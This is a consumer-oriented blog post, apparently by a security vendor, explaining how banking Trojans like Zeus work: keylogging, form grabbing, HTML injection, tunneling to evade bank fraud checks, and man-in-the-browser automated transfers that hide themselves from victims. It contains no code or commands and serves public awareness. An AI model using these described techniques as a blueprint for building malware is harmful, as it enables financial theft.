The Power of Financial Malware
There are a whole lot of different types of malware out there. This software, which is defined as having criminal or malicious capabilities, can include malware that’s designed to inject ads (adware); malware that encrypts files for the purpose of extorting the file owner (ransomware); and, of course, malware that silently tracks every one of the user’s actions on the infected computer in order to steal their credentials (Trojan horse). And malware isn’t only developed and used by hackers. There is also sophisticated malware that has been developed by governments and intelligence agencies, such as the famous Stuxnet and Flame malwares.
But malware developed by cybercriminals can be just as sophisticated as government or intelligence agency creations. One especially sophisticated type of malware hackers use is financial malware—Trojan horses that are specifically designed to steal usernames, passwords and other credentials used with financial institutions such as banks.
Below, we explore some capabilities that financial malware often possess. All of these capabilities don’t necessarily exist in all financial malwares, but the Zeus malware (also known as Zbot)—the most famous financial malware used by hackers—does contain them all (yikes!).
1. Keylogging Software
Can you imagine what a hacker could do if he saw everything you type on your keyboard? For starters, he’d have access to everything—your email account, social media accounts, bank account, and more. Thinking about everything he could accomplish with that information (like depleting your bank account, or applying for loans on your name and impacting your credit) is scary.
Keylogging malware, as the name suggests, logs every key pressed on the infected machine. The Trojan simply captures and saves every key pressed on the machine, allowing cybercriminals to later view what was typed. Regardless of whether the written text was hidden (such as text entered into a password field), or even deleted by the user after it was typed, everything is saved by the keylogger malware.
The downside of keylogging (from the hacker’s perspective, of course) is that many malwares do not track which fields the logged text was entered into. That is, keylogged word could be a username, a password or anything else. This leaves it up to the hacker to figure out which keylogged words are what… which probably isn’t that difficult of a job. After all, it’s pretty easy to guess that words like JohnS2112 or Mikeis2kul are usernames, while a word like Blue123abc is likely a password.
2. Form Grabbing
Just like “word grabbing” through keylogging, hackers also employ form grabbing. Every time we perform a Google search, or log into Facebook or any other online service, we’re filling out a form. These forms have a variety of fields including text fields (like password fields), buttons, multiple-choice options and more.
Conveniently for hackers, data from the form that’s sent to a server includes both the values the user inputs into each part of the form, as well as the name of each field (i.e., username, password, etc.). With form grabbing Trojans, hackers can grab this information in an easy-to-use, readable format.
Here’s an example of a form a user may fill out:
And here’s the captured data the hacker would receive:
Form grabber data
Regardless of what site you’re using when you fill out a form, because the form-grabbing malware is locally installed on the victim’s computer, it doesn’t matter if the traffic itself is secure and encrypted (the little padlock in the URL); everything is saved by the malware unencrypted. (Wondering how a victim’s computer gets infected in the first place? See a quick explanation in our recent post about Exploit Kits.)
Form grabbing and keylogging work well in conjunction. While form grabbing is more easily-readable, there are still instances where the values sent in the form could be obfuscated. Tracking what keys were actually pressed is something that cannot be obfuscated in any way
3. HTML Injection
For hackers that are out to do some serious damage, such as breaching into a victim’s bank account and stealing money, keylogged words and grabbed forms don’t always cut it.
Typically, when performing online banking transactions, for example, banks will require users to enter additional authentication details such as social security number, mother’s maiden name or date of birth. And these details aren’t typically required as part of the initial login phase. What’s a cybercriminal to do? Why, simply add them to the form using HTML injection, of course.
Through HTML injections, hackers are able to add additional fields of their choosing to any form. So, when the user of the infected machine first loads up their bank’s website, for example, they won’t only see the typical username and password fields. Instead, the malware on their machines will add additional fields requesting data the hacker is after, such as social security number. Of course, this might lead the seasoned online banking user into thinking that the new field is an added security measure employed by the bank, and he will readily provide it.
Here’s what a form with HTML injections might look like:
An example of an HTML Injection. The original page is on the left; the page on the right was altered by malware. Source: The blog of Andreas Baumhof.
Of course, hackers who want to perform HTML injections can simply buy kits of these injections in the underground, so they don’t need much technical know-how to use this powerful tool. They can even buy HTML injections designed for specific banks.
4. Tunneling Through a Victim’s Machine
With the victim’s credentials in-hand using the capabilities we’ve discussed up until now, it’s time for the hacker to turn the stolen data into cash.
Most anti-fraud measures employed by banks profile users and search for anomalies in order to detect suspicious activities. Every time a user logs into his or her bank account online, multiple characteristics of the user’s machine—such as which browser and operating system are being used and whether there are any cookies—are collected. As more and more differences in what the bank is used seeing arise, more scrutiny is applied when investigating money transfers attempted during that particular login session.
To circumvent such anti-fraud measures, hacker’s financial malware allows the hacker to tunnel through the victim’s machine. That basically means that most of the characteristics tracked by the bank would continue to be exactly what they’d typically be. After all, it’s the user’s machine that’s connecting to the bank, despite being controlled by a puppet-master sitting somewhere across the globe.
Leave it to hackers to develop ways to automate processes that would otherwise take up too much of their time and energy.
Here’s some food for thought: Hackers could have a LOT of stolen bank account information in-hand. Think: the online banking details of hundreds or even thousands of victims. And hackers are busy people; they simply don’t have the time to manually use all of those credentials in order to perform money transfers. That’s where Man-In-The-Browser malware (or MITB) comes in, to do the dirty work for them.
How Man-In-The-Browser Malware Works. Source: Security Intelligence
With an MITB capability, hackers can automate not only data collection, but also their cashout process. Here’s how it works:
A Man-In-The-Browser malware sits in the background and waits for the user to log into their online bank account. Once the user logs in, the Man-In-The-Browser script is activated and automatically obtains the user’s account balance. The script then communicates with a server that’s run by the hacker and retrieves the details of the account to which the stolen money will be transferred (this account is typically a mule account). The transfer amount is calculated based on the balance and guidelines regarding how much the mule account can receive. And voila! It then issues the money transfer.
Since the whole thing is automated, the money transfer only takes a matter of seconds. During those precious moments, the victim thinks the online banking page is still loading (I don’t know about you, but when a page takes a few extra seconds to load, I usually think it’s an issue with my Internet speed… not that super-sophisticated malware is stealing my hard-earned money).
This financial malware is pretty intelligent, too. It’s not going to leave any tracks that might lead to the hacker getting caught. In order to keep victims in the dark, MITB malware actually changes the balance that appears once the victim’s online banking page finally loads to the balance before the fraudulent transfer. If the victim goes into his activity history page, the malware conceals the fraudulent transfer from the transactions list.
For their part, all the bank sees is a legitimate user logging into his bank account and issuing a money transfer (after all, the MITB script runs locally on the victim’s machine). That makes MITB even more difficult to spot.
Financial malware clearly has a lot of capabilities, including some we haven’t covered here. Some of these capabilities are rarely used, and are merely designed to obtain needed data in very specific scenarios. For example, there is malware that can take screenshots when a victim visits a specific website, which hackers sometimes rely on if their target is using a virtual keyboard. Virtual keyboards are tools designed to prevent keyloggers and form grabbers from capturing the users’ passwords. Instead of typing on the keyboard in order to complete a form, the user is asked to enter a password or a PIN code using his or her mouse. As a result, “standard” malware won’t be able to capture the password.
A virtual passcode keypad
In order to obtain the victim’s password anyway, the malware takes screenshots every time the mouse button is pressed. With this, the hacker ends up with a series of screenshots revealing the PIN number.
It’s important to be educated about financial malware, especially as it doesn’t look like this threat will be history anytime soon. Indeed, news outlets only recently reported the rise of Dyre, a brand new type of financial malware.
In the end, thanks largely in part to hackers’ ability to keep adding new features and capabilities to malware, they’ll continue to develop ways to circumvent almost any new security measure thrown at them. A machine infected by malware is basically in the hacker’s complete control, giving them way too much power.
Have you had any personal experience with financial malware? Tell us about it in the comments below!
Want to see more content like this? Subscribe to get a weekly roundup from BlogDOG.
The LogDog anti-hacking and privacy tool protects the most popular online account types including Gmail, Facebook, and Dropbox by detecting unusual access activity and alerting users so they can take control of their accounts before hackers do.
The service can be used across all devices and OS’s, so you’re always being protected. Here’s the Android and iOS links for you to check out.